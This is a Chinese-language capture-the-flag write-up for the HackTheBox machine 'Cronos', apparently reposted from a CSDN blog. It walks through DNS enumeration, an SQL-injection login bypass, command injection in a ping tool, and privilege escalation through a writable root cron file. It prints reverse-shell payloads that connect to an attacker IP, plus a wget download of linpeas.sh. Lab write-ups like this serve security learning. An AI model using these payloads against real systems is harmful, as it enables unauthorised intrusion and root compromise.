您的位置:首页 > 房产 > 建筑 > HackTheBox-Machines--Cronos

HackTheBox-Machines--Cronos

2024/7/6 20:10:55 来源:https://blog.csdn.net/sycamorelg/article/details/139226830  浏览:    关键词:HackTheBox-Machines--Cronos

文章目录

  • 0x01 信息收集
  • 0x02 命令注入漏洞
  • 0x03 权限提升

Cronos 测试过程

0x01 信息收集


1.端口扫描

发现 SSH(22)、DNS(53)、HTTP(80)端口

nmap -sC -sV 10.129.227.211

在这里插入图片描述

2.53端口开启,进行DNS枚举

    发现子域名:ns1.cronos.htb,确定域名为cronos.htb

在这里插入图片描述

2.1 DNS区域传输

  返回主域、子域:cronos.htb、admin.cronos.htb、ns1.cronos.htb、www.cronos.htb

在这里插入图片描述

3.访问发现的主域、子域

3.1 IP访问、ns1.cronos.htb
在这里插入图片描述

3.2 cronos.htb 和 www.cronos.htb

  两个链接都指向外部网站 Laravel,搜索相关Laravel漏洞,但是不知道具体版本。
在这里插入图片描述

3.3 admin.cronos.htb

在这里插入图片描述

  admin.cronos.htb指向登录请求,尝试进行SQL注入漏洞

# 用户名输入paylaod
' or 1=1-- -

在这里插入图片描述


0x02 命令注入漏洞

  在抓取执行命令的请求包后,发现Net Tool工具执行的命令检索为:ping -c 1 127.0.0.1,command 和 host 拼接进行执行。

1.尝试更改command命令进行命令注入

在这里插入图片描述

# 更改command命令为id,host留空,执行命令为:id,成功响应
id

在这里插入图片描述

2.执行命令获取反弹shell

# payload
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.25/4444+0>%261'

在这里插入图片描述

在这里插入图片描述

  执行成功,获取到shell

在这里插入图片描述

在这里插入图片描述


0x03 权限提升

1.检查可获取root权限文件

# 上传linpeas.sh
wget http://10.10.14.25:8000/linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh

  发现 /var/www/laravel/ artisan 文件是一个计划任务文件,并且将以 root 权限每分钟运行一次。
  如果可以 www-data 用户对该文件具有写入权限,那么可以通过在文件中写入反弹shell命令获取到root权限。

在这里插入图片描述

2.检查 artisan 文件权限

  www-data 对 artisan 文件具有写入权限

在这里插入图片描述

3.在artisan 文件写入反弹shell命令

echo  '<?php exec("/bin/bash -c ' "'" 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1' "'" '");' > artisan

在这里插入图片描述

  artisan文件每分钟会执行一次,等到文件执行,获取到root权限

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com